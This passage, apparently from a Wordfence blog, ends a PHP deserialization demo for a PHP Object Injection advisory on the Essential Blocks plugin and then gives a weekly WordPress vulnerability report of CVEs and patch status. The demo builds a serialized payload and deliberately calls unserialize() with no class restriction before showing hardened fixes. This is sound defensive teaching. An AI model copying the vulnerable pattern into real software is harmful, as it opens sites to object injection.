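    public function __destruct()
    {
        // A real cleanup helper might unlink($this->path) here. Whatever it
        // does, it runs with property values the request author chose.
        self::$log[] = 'destructor ran with path=' . $this->path;
    }
}

// Vulnerable pattern: block attributes arrive as a PHP-serialized string and
// are unserialized with no class restriction, so any class loaded on the
// site can be instantiated with attacker-controlled properties.
function parse_attributes_vulnerable(string $raw): mixed
{
    return unserialize($raw);
}

// Hardened form 1: keep the wire format but forbid object instantiation.
// Any object in the input becomes __PHP_Incomplete_Class, whose magic
// methods (__wakeup, __destruct, ...) never run.
function parse_attributes_no_classes(string $raw): mixed
{
    return unserialize($raw, ['allowed_classes' => false]);
}

// Hardened form 2 (preferred): stop accepting PHP serialization entirely.
// JSON decodes to scalars and arrays only, so there is no object to inject.
function parse_attributes_json(string $raw): ?array
{
    try {
        $decoded = json_decode($raw, true, 32, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null; // malformed input is rejected rather than guessed at
    }
    return is_array($decoded) ? $decoded : null;
}

// --- Demo -----------------------------------------------------------------

// Constructed payload: a serialized CleanupHelper with a chosen property.
$helper = new CleanupHelper();
$helper->path = '/tmp/request-author-chosen';
$payload = serialize($helper);
unset($helper);
CleanupHelper::$log = []; // discard the entry from destroying $helper above

// 1. Vulnerable: a real CleanupHelper is instantiated, and its destructor
//    fires as soon as the handler drops its last reference to it.
$obj = parse_attributes_vulnerable($payload);
var_dump($obj instanceof CleanupHelper);
unset($obj);
print_r(CleanupHelper::$log); // now holds the destructor's entry

// 2. allowed_classes => false: same payload, but no real object is created,
//    so the log stays empty after the value is dropped.
CleanupHelper::$log = [];
$safe = parse_attributes_no_classes($payload);
var_dump($safe instanceof __PHP_Incomplete_Class);
unset($safe);
var_dump(CleanupHelper::$log);

// 3. JSON: ordinary block attributes decode to an array; the serialized
//    payload is not valid JSON and is rejected with null.
var_dump(parse_attributes_json('{"per_page":5,"order":"desc"}'));
var_dump(parse_attributes_json($payload));
```

The design point is the third function: switching the endpoint's wire format to JSON removes the deserialization sink altogether, whereas `allowed_classes => false` only neutralizes it and still leaves `unserialize()` reachable from unauthenticated input. When auditing a plugin for this bug class, grep for `unserialize(` and `maybe_unserialize(` on values that originate from `$_GET`, `$_POST` or a REST request parameter, and treat any call without an `allowed_classes` restriction as a finding regardless of whether a POP chain is currently installed.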

Timeline

August 17, 2023 – The Wordfence Threat Intelligence team discovers two PHP Object Injection vulnerabilities in the Essential Blocks plugin.
August 18, 2023 – We release a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers and initiate the disclosure process.
August 23, 2023 – We send the full disclosure to the plugin developer.
August 29, 2023 – A patched version of the Essential Blocks plugin, 4.2.1 (1.1.1 for Pro), is released.
September 17, 2023 – The firewall rule becomes available to free Wordfence users.

Conclusion

In this blog post, we covered two PHP Object Injection vulnerabilities in the Essential Blocks plugin affecting versions 4.2.0 and earlier in the Free version of the plugin and versions 1.1.0 and earlier in the Pro version. These vulnerabilities allow unauthenticated threat actors to query the plugin’s API using serialized malicious payloads that are subsequently deserialized. They have been fully addressed in version 4.2.1 of the free version of the plugin and 1.1.1 of the Pro version of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of Essential Blocks.

All Wordfence users running Wordfence Premium, Wordfence Care, and Wordfence Response have been protected against these vulnerabilities as of August 18, 2023. Users still using the free version of Wordfence received protection on September 17, 2023.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as these vulnerabilities pose a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

The post Two PHP Object Injection Vulnerabilities Fixed in Essential Blocks appeared first on Wordfence.

Wordfence Intelligence Weekly WordPress Vulnerability Report (September 4, 2023 to September 10, 2023)

Last week, there were 107 vulnerabilities disclosed in 89 WordPress Plugins and 5 WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 36 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data to make the internet more secure. That is why the Wordfence Intelligence user interface, vulnerability API and webhook notifications are completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.


New Firewall Rules Deployed Last Week

The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.

The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our Premium, Care, and Response customers last week:

Wordfence Premium, Care, and Response customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.


Total Unpatched & Patched Vulnerabilities Last Week

Patch Status Number of Vulnerabilities
Unpatched 44
Patched 63

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating Number of Vulnerabilities
Low Severity 2
Medium Severity 89
High Severity 11
Critical Severity 5

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) 35
Cross-Site Request Forgery (CSRF) 31
Missing Authorization 24
Unrestricted Upload of File with Dangerous Type 3
Authorization Bypass Through User-Controlled Key 2
Deserialization of Untrusted Data 2
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) 2
External Control of File Name or Path 1
Improper Input Validation 1
Server-Side Request Forgery (SSRF) 1
Improper Privilege Management 1
Improper Neutralization of Formula Elements in a CSV File 1
Improper Encoding or Escaping of Output 1
Information Exposure 1
Improper Authorization 1

Researchers That Contributed to WordPress Security Last Week

Researcher Name Number of Vulnerabilities
Rio Darmawan 11
Mika 10
Abdi Pranata 10
Rafshanzani Suhada 7
thiennv 5
yuyudhn 4
Rafie Muhammad 4
LEE SE HYOUNG 3
Le Ngoc Anh 3
NGÔ THIÊN AN 3
Nguyen Xuan Chien 3
Marco Wotschka (Wordfence Vulnerability Researcher) 2
Revan Arifio 2
Lana Codes (Wordfence Vulnerability Researcher) 2
Skalucy 2
Elliot 2
FearZzZz 2
qilin_99 2
Pepitoh 1
Shuning Xu 1
deokhunKim 1
DoYeon Park 1
spacecroupier 1
Nguyen Anh Tien 1
Debangshu Kundu 1
Arpeet Rathi 1
Ravi Dharmawan 1
Theodoros Malachias 1
Alexander Concha 1
Pedro José Navas Pérez 1
Alex Sanford 1
emad 1
Emili Castells 1
Pavitra Tiwari 1
Alex Concha 1
László Radnai 1


Are you a security researcher who would like to be featured in our weekly vulnerability report? You can responsibly disclose your WordPress vulnerability discoveries to us and obtain a CVE ID through this form. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the Wordfence Intelligence leaderboard along with being mentioned in our weekly vulnerability report.


WordPress Plugins with Reported Vulnerabilities Last Week

Software Name Software Slug
AcyMailing – Newsletter & mailing automation for WordPress acymailing
All in One B2B for WooCommerce all-in-one-b2b-for-woocommerce
Analytify – Google Analytics Dashboard For WordPress (GA4 made easy) wp-analytify
Auto Amazon Links – Amazon Associates Affiliate Plugin amazon-auto-links
Automatic YouTube Gallery automatic-youtube-gallery
Back To The Top Button back-to-the-top-button
BackupBliss – Backup Migration Staging backup-backup
BitPay Checkout for WooCommerce bitpay-checkout-for-woocommerce
Bulk NoIndex & NoFollow Toolkit bulk-noindex-nofollow-toolkit-by-mad-fish
CP Blocks cp-blocks
Carousel Slider carousel-slider
Click To Tweet click-to-tweet
Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms fluentform
Cookie Notice & Consent cookie-notice-consent
Customizable WordPress Gallery Plugin – Modula Image Gallery modula-best-grid-gallery
Directorist – WordPress Business Directory Plugin with Classified Ads Listings directorist
Duplicate Post Page Menu & Custom Post Type duplicate-post-page-menu-custom-post-type
EWWW Image Optimizer ewww-image-optimizer
Easy Form by AYS easy-form
Easy WP Cleaner easy-wp-cleaner
Email posts to subscribers email-posts-to-subscribers
EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor embedpress
Export Import Menus export-import-menus
Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder form-maker
Goods Catalog goods-catalog
Hide admin notices – Admin Notification Center wp-admin-notification-center
Insert Estimated Reading Time insert-estimated-reading-time
Laposta Signup Basic laposta-signup-basic
Laposta Signup Embed laposta-signup-embed
Leadster leadster-marketing-conversacional
Live News live-news-lite
Locations locations
MailMunch – Grow your Email List mailmunch
Media Library Assistant media-library-assistant
My Account Page Editor my-account-page-editor
MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce mycryptocheckout
Notice Bar notice-bar
Order Delivery Date for WP e-Commerce order-delivery-date
Outbound Link Manager outbound-link-manager
POEditor poeditor
Paid Membership Plugin, Ecommerce, Registration Form, Login Form, User Profile & Restrict Content – ProfilePress wp-user-avatar
PeproDev CF7 Database pepro-cf7-database
Poll Maker – Best WordPress Poll Plugin poll-maker
Premium Starter Templates astra-pro-sites
RSVPMaker rsvpmaker
Realbig For WordPress realbig-media
Regpack regpack
Rescue Shortcodes rescue-shortcodes
Restrict – membership, site, content and user access restrictions for WordPress restricted-content
SAML Single Sign On – SSO Login Standard miniorange-saml-20-single-sign-on
SIS Handball sis-handball
SendPress Newsletters sendpress
Simple Download Counter simple-download-counter
Simple Membership simple-membership
Slider Pro sliderpro
Social Share, Social Login and Social Comments Plugin – Super Socializer super-socializer
Staff / Employee Business Directory for Active Directory ldap-ad-staff-employee-directory-search
StagTools stagtools
Starter Templates — Elementor, WordPress & Beaver Builder Templates astra-sites
Stock Quotes List stock-quotes-list
Sunshine Photo Cart sunshine-photo-cart
Swifty Bar, sticky bar by WPGens swifty-bar
TelSender – Сontact form 7, Events, Wpforms and wooccommerce to telegram bot telsender
Tilda Publishing tilda-publishing
Travel Map travelmap-blog
UniConsent CMP for GDPR CPRA GPP TCF uniconsent-cmp
Use Memcached use-memcached
User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds userfeedback-lite
User Submitted Posts – Enable Users to Submit Posts from the Front End user-submitted-posts
VS Contact Form very-simple-contact-form
WP Accessibility Helper (WAH) wp-accessibility-helper
WP Crowdfunding wp-crowdfunding
WP Custom Post Template wp-custom-post-template
WP Directory Kit wpdirectorykit
WP Gallery Metabox wp-gallery-metabox
WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts wedevs-project-manager
WP iCal Availability wp-ical-availability
WP-dTree wp-dtree-30
WRC Pricing Tables – WordPress Responsive CSS3 Pricing Tables wrc-pricing-tables
WiserNotify Social Proof & FOMO Notification, WooCommerce Sales Popup, Review Popups, Notification Bars & Urgency Widgets wiser-notify
WooCommerce PensoPay woo-pensopay
Woocommerce Support System wc-support-system
WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds another-wordpress-classifieds-plugin
WordPress File Sharing Plugin user-private-files
WordPress Social Login wordpress-social-login
iFolders – Ultimate Folder Manager for Media, Pages, Posts & etc ifolders
rtMedia for WordPress, BuddyPress and bbPress buddypress-media
wordpress publish post email notification publish-post-email-notification
wpCentral wp-central

WordPress Themes with Reported Vulnerabilities Last Week

Software Name Software Slug
Attorney attorney
Flatsome flatsome
Raise Mag raise-mag
Wishful Blog wishful-blog
Woodmart woodmart

Vulnerability Details

Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities.

Media Library Assistant <= 3.09 – Unauthenticated Local/Remote File Inclusion & Remote Code Execution

Affected Software: Media Library Assistant
CVE ID: CVE-2023-4634
CVSS Score: 9.8 (Critical)
Researcher/s: Pepitoh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/05c68377-feb6-442d-a3a0-1fbc246c7cbf

RSVPMaker <= 10.6.6 – Unauthenticated PHP Object Injection

Affected Software: RSVPMaker
CVE ID: CVE-2023-25054
CVSS Score: 9.8 (Critical)
Researcher/s: Ravi Dharmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/647cc71d-4d3a-4722-b498-baaee2450809

All in One B2B for WooCommerce <= 1.0.3 – Unauthenticated Privilege Escalation

Affected Software: All in One B2B for WooCommerce
CVE ID: CVE-2023-4703
CVSS Score: 9.8 (Critical)
Researcher/s: Alexander Concha
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/aab3016d-5834-4b4a-a206-0b626884b335

Flatsome <= 3.17.5 – Unauthenticated PHP Object Injection

Affected Software: Flatsome
CVE ID: CVE-2023-40555
CVSS Score: 9.8 (Critical)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bfc4863a-1b8c-4b13-9df1-18f221b40b26

Form Maker by 10Web <= 1.15.19 – Unauthenticated Arbitrary File Upload

Affected Software: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder
CVE ID: CVE Unknown
CVSS Score: 9.8 (Critical)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c691d129-35db-4de8-a28e-5e77347e2280

WP Project Manager <= 2.6.0 – Authenticated (Subscriber+) SQL Injection


Export Import Menus <= 1.8.0 – Authenticated (Contributor+) Arbitrary File Upload

Affected Software: Export Import Menus
CVE ID: CVE-2023-34385
CVSS Score: 8.8 (High)
Researcher/s: Emili Castells
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d74efb03-4a1c-4163-bd79-ef17975a609e

My Account Page Editor <= 1.3.1 – Authenticated (Subscriber+) Arbitrary File Upload

Affected Software: My Account Page Editor
CVE ID: CVE-2023-4536
CVSS Score: 8.8 (High)
Researcher/s: Alex Concha
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f87b6987-8896-4edf-9b14-8582426adeb0

ProfilePress <= 4.13.2 – Limited Privilege Escalation via ‘acceptable_defined_roles’


Woocommerce Support System <= 1.2.0 – Missing Authorization

Affected Software: Woocommerce Support System
CVE ID: CVE-2023-41686
CVSS Score: 7.3 (High)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8004a306-4c8f-40e9-accc-a12d65b5f2f9

Woocommerce Support System <= 1.2.0 – Authenticated (Administrator+) SQL Injection via ‘orderby’

Affected Software: Woocommerce Support System
CVE ID: CVE-2023-41685
CVSS Score: 7.2 (High)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/efab7ec7-7143-4556-8d68-4a7e34f46e9e

Travel Map <= 1.0.1 – Unauthenticated Cross-Site Scripting

Affected Software: Travel Map
CVE ID: CVE-2023-41860
CVSS Score: 7.2 (High)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3f04a742-56be-42e9-9080-2131c6e98325

Click To Tweet <= 2.0.14 – Unauthenticated Cross-Site Scripting

Affected Software: Click To Tweet
CVE ID: CVE-2023-41856
CVSS Score: 7.2 (High)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b5031140-9a48-43da-b946-00ce9c70258b

PeproDev CF7 Database <= 1.7.0 – Unauthenticated Stored Cross-Site Scripting via form submission

Affected Software: PeproDev CF7 Database
CVE ID: CVE-2023-41863
CVSS Score: 7.2 (High)
Researcher/s: FearZzZz
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c7a7df90-a542-48cf-a58e-bcbddc978df2

Simple Membership <= 4.3.5 – Reflected Cross-Site Scripting

Affected Software: Simple Membership
CVE ID: CVE-2023-4719
CVSS Score: 7.2 (High)
Researcher/s: FearZzZz
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e4b10172-7e54-4ff8-9fbb-41d160ce49e4

User Feedback <= 1.0.7 – Unauthenticated Stored Cross-Site Scripting

Affected Software: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds
CVE ID: CVE-2023-39308
CVSS Score: 7.2 (High)
Researcher/s: Revan Arifio
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f9e45bc2-6db6-49cd-8a4a-58489a8ddac2

All in One B2B for WooCommerce <= 1.0.3 – Cross-Site Request Forgery

Affected Software: All in One B2B for WooCommerce
CVE ID: CVE-2023-3547
CVSS Score: 6.5 (Medium)
Researcher/s: Alex Sanford
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bd53bc57-b10e-47a7-8c10-96bf1f1e82a5

Auto Amazon Links <= 5.3.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via style

Affected Software: Auto Amazon Links – Amazon Associates Affiliate Plugin
CVE ID: CVE-2023-4482
CVSS Score: 6.4 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/11ffb8a1-55d2-44c5-bcd2-ba866b94e8bc

Goods Catalog <= 2.4.1 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Goods Catalog
CVE ID: CVE-2023-41687
CVSS Score: 6.4 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/21542a9e-efa2-4655-b076-d282e3678fdf

Rescue Shortcodes <= 2.5 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Rescue Shortcodes
CVE ID: CVE-2023-41728
CVSS Score: 6.4 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6a11e7c9-f565-4a8c-895f-425c6654b5a9

Starter Templates <= 3.2.4 – Authenticated (Contributor+) Server-Side Request Forgery

Affected Software/s: Starter Templates — Elementor, WordPress & Beaver Builder Templates, Premium Starter Templates
CVE ID: CVE-2023-41804
CVSS Score: 6.4 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6e0bdbba-2b67-42b9-8c26-115d472aed0e

Simple Download Counter <= 1.6 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Simple Download Counter
CVE ID: CVE-2023-4838
CVSS Score: 6.4 (Medium)
Researcher/s: NGÔ THIÊN AN
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/aa5f7f2a-c7b7-4339-a608-51fd684c18bf

User Submitted Posts <= 20230901 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: User Submitted Posts – Enable Users to Submit Posts from the Front End
CVE ID: CVE-2023-41696
CVSS Score: 6.4 (Medium)
Researcher/s: NGÔ THIÊN AN
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b7fca965-86f8-4ee4-a9d6-cb18fe5f098e

WordPress Social Login <= 3.0.4 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: WordPress Social Login
CVE ID: CVE-2023-4773
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b987822d-2b1b-4f79-988b-4bd731864b63

User Submitted Posts – Enable Users to Submit Posts from the Front End <= 20230811 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: User Submitted Posts – Enable Users to Submit Posts from the Front End
CVE ID: CVE-2023-4779
CVSS Score: 6.4 (Medium)
Researcher/s: NGÔ THIÊN AN
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d21ca709-183f-4dd1-849c-f1b2a4f7ec43

Notice Bar <= 3.1.0 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Notice Bar
CVE ID: CVE-2023-41847
CVSS Score: 6.4 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/defc5b5a-243d-4564-a9f8-3ecf3538129b

Locations <= 4.0 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Locations
CVE ID: CVE-2023-41797
CVSS Score: 6.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/fe10acf6-2649-4e85-abd1-b6840169eb41

Attorney <= 3 – Reflected Cross-Site Scripting

Affected Software: Attorney
CVE ID: CVE-2023-41692
CVSS Score: 6.1 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/026443b6-4ab5-4f31-8a8d-2019097bde4c

Restrict <= 2.2.4 – Reflected Cross-Site Scripting

Affected Software: Restrict – membership, site, content and user access restrictions for WordPress
CVE ID: CVE-2023-41861
CVSS Score: 6.1 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/62029ce5-ab97-4594-93e6-469ef5692320

WooCommerce PensoPay <= 6.3.1 – Reflected Cross-Site Scripting via ‘pensopay_action’

Affected Software: WooCommerce PensoPay
CVE ID: CVE-2023-41691
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6845b506-3d38-47f6-9348-d7931e65707a

WoodMart <= 7.2.4 – Reflected Cross-Site Scripting

Affected Software: Woodmart
CVE ID: CVE-2023-41872
CVSS Score: 6.1 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6fc92b8f-6794-461a-b6b6-598de21f5e2d

AcyMailing SMTP Newsletter <= 8.6.2 – Reflected Cross-Site Scripting

Affected Software: AcyMailing – Newsletter & mailing automation for WordPress
CVE ID: CVE-2023-41867
CVSS Score: 6.1 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9f82ec7c-72a0-4c3b-8041-c6ad080a48f1

Stagtools <= 2.3.7 – Reflected Cross-Site Scripting

Affected Software: StagTools
CVE ID: CVE-2023-41868
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ca09ce0d-3989-420d-9457-f0acd709cc6b

Poll Maker <= 4.7.0 – Reflected Cross-Site Scripting

Affected Software: Poll Maker – Best WordPress Poll Plugin
CVE ID: CVE-2023-41871
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/faad9cf7-5d83-4ade-b121-c38fb0de78a5

Wishful Blog <= 2.0.1 & Raise Mag <= 1.0.7 – Unauthenticated Cross-Site Scripting

Affected Software/s: Raise Mag, Wishful Blog
CVE ID: CVE-2023-28621
CVSS Score: 6.1 (Medium)
Researcher/s: László Radnai
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/fb33f779-d045-48dd-babe-8b1fab903124

Stock Quotes List <= 2.9.9 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Stock Quotes List
CVE ID: CVE-2023-41666
CVSS Score: 5.4 (Medium)
Researcher/s: deokhunKim
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1dffbb2d-69d1-495c-8c96-64c5fd878fcd

Tilda Publishing <= 0.3.21 – Missing Authorization

Affected Software: Tilda Publishing
CVE ID: CVE-2023-31234
CVSS Score: 5.4 (Medium)
Researcher/s: spacecroupier
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4a992bb2-67b9-48db-a536-c3af79e93af4

Staff / Employee Business Directory for Active Directory <= 1.2.1 – Insufficient Escaping of Stored LDAP Values

Affected Software: Staff / Employee Business Directory for Active Directory
CVE ID: CVE-2023-4757
CVSS Score: 5.4 (Medium)
Researcher/s: Pedro José Navas Pérez
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b1355e9f-fa3a-439a-a13f-49b10dd4473a

Easy WP Cleaner <= 1.9 – Cross-Site Request Forgery

Affected Software: Easy WP Cleaner
CVE ID: CVE-2023-41697
CVSS Score: 5.4 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c4c2689d-be51-4907-b624-c85da39f545d

Contact Form Plugin by Fluent Forms <= 5.0.8 – Insecure Direct Object Reference

Affected Software: Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms
CVE ID: CVE-2023-41952
CVSS Score: 5.3 (Medium)
Researcher/s: Revan Arifio
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/20f31e48-0dbb-498a-a400-681cacea7c9c

Sunshine Photo Cart <= 3.0.5 – Insecure Direct Object Reference to Order Manipulation

Affected Software: Sunshine Photo Cart
CVE ID: CVE-2023-41796
CVSS Score: 5.3 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/2eae7c33-2347-4b34-8b5f-7f4a6ee3e9c1

TelSender <= 1.14.7 – Missing Authorization

Affected Software: TelSender – Сontact form 7, Events, Wpforms and wooccommerce to telegram bot
CVE ID: CVE-2023-41683
CVSS Score: 5.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/39193ebd-005a-4497-9939-99947323a1a0

WP Directory Kit <= 1.2.6 – Missing Authorization

Affected Software: WP Directory Kit
CVE ID: CVE-2023-41875
CVSS Score: 5.3 (Medium)
Researcher/s: Debangshu Kundu, Arpeet Rathi
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/60083262-198d-4a7d-bb0a-717a744e20f9

Email posts to subscribers <= 6.2 – Missing Authorization to Sensitive Information Exposure

Affected Software: Email posts to subscribers
CVE ID: CVE-2023-41735
CVSS Score: 5.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7730d670-d270-4755-bc9a-550498a28edb

WRC Pricing Tables <= 2.3.7 – Missing Authorization

Affected Software: WRC Pricing Tables – WordPress Responsive CSS3 Pricing Tables
CVE ID: CVE-2023-32293
CVSS Score: 5.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/823dc422-12f4-4f7d-a305-2e4db18bafdf

WiserNotify Social Proof <= 2.5 – Missing Authorization


EWWW Image Optimizer <= 7.2.0 – Sensitive Information Exposure

Affected Software: EWWW Image Optimizer
CVE ID: CVE Unknown
CVSS Score: 5.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d7d08bfd-9861-4e21-a696-25b00233ad94

VS Contact Form <= 13.9 – Missing Authorization

Affected Software: VS Contact Form
CVE ID: CVE-2023-41862
CVSS Score: 5.3 (Medium)
Researcher/s: qilin_99
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e3f665b8-fbd5-4100-baf6-3fa99332a5dc

BitPay Checkout for WooCommerce <= 4.1.0 – Missing Authorization

Affected Software: BitPay Checkout for WooCommerce
CVE ID: CVE-2023-41803
CVSS Score: 5.3 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ea489c69-d4d9-4e05-8cac-25fd17d48506

UniConsent Cookie Consent CMP for GDPR / CCPA <= 1.4.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: UniConsent CMP for GDPR CPRA GPP TCF
CVE ID: CVE-2023-41800
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/19c9cf3e-553b-4cbd-9f2c-803e188a2581

WordPress File Sharing Plugin <= 2.0.3 – Authenticated (Admin+) Stored Cross-Site Scripting

Affected Software: WordPress File Sharing Plugin
CVE ID: CVE-2023-4636
CVSS Score: 4.4 (Medium)
Researcher/s: Shuning Xu
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1df04293-87e9-4ab4-975d-54d36a993ab0

Insert Estimated Reading Time <= 1.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Insert Estimated Reading Time
CVE ID: CVE-2023-41734
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/45426cdd-2721-4959-8f0b-13025f775d62

Cookie Notice & Consent 1.6.0 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Cookie Notice & Consent
CVE ID: CVE-2023-41948
CVSS Score: 4.4 (Medium)
Researcher/s: DoYeon Park
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/489dc156-b8cb-4e08-a847-73a891398d5c

SendPress Newsletters <= 1.22.3.31 – Authenticated (Administrator+) Stored Cross-Site Scripting

